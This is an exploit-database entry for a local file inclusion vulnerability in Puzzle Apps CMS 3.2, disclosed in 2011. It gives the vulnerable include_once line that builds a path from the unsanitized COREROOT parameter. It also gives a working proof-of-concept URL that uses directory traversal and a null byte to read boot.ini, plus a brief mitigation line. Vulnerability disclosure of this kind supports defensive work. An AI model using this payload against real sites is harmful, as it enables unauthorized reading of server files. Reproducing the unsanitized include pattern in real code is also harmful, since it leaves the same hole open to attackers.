header-logo
Suggest Exploit
vendor:
Puzzle Apps CMS
by:
Treasure Priyamal
4.3
CVSS
MEDIUM
Local File Inclusion
98
CWE
Product Name: Puzzle Apps CMS
Affected Version From: 3.2
Affected Version To: 3.2
Patch Exists: NO
Related CWE: N/A
CPE: a:puzzle_apps:puzzle_apps_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XPsp2 + WAMP
2011

Puzzle Apps CMS 3.2 Local File Inclusion

In Puzzle App CMS there are couple of the places you will be able to find LFI vulns. The vulnerable source is include_once ($COREROOT . "config/loader.config.php"); and the sample to LFI is http://localhost/puzzle/core/config.loader.php?COREROOT=[LFI] and the PoC LFI is http://localhost/puzzle/core/config.loader.php?COREROOT=../../../boot.ini%00

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

# ------------------------------------------------------------------------
# Software................ Puzzle Apps CMS 3.2
# Vulnerability........... Local File Inclusion 
# Site.................... http://www.puzzleapps.org/
# Download Link........... http://sourceforge.net/projects/puzzlecms/files/puzzlecms/Puzzle Apps CMS 3.2/puzzle-3.2.tar.gz/download
# Discovery Date.......... 5/29/2011
# Tested On............... Windows XPsp2 + WAMP
# ------------------------------------------------------------------------
# Author.................. Treasure Priyamal
# Site.................... http://www.treasuresec.com/
# Email................... Treasure Priyamal <treasure@treasuresec.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# In Puzzle App CMS there are couple of the places you will be able to find 
# LFI vulns. 
#
#
# -- Vulnerable Source
# include_once ($COREROOT . "config/loader.config.php");
#
# --Sample to LFI--
# 
#http://localhost/puzzle/core/config.loader.php?COREROOT=[LFI]
#
#
# --PoC LFI --
#
#http://localhost/puzzle/core/config.loader.php?COREROOT=../../../boot.ini%00
#
#

Navigation

Suggest Exploit

Services By CQR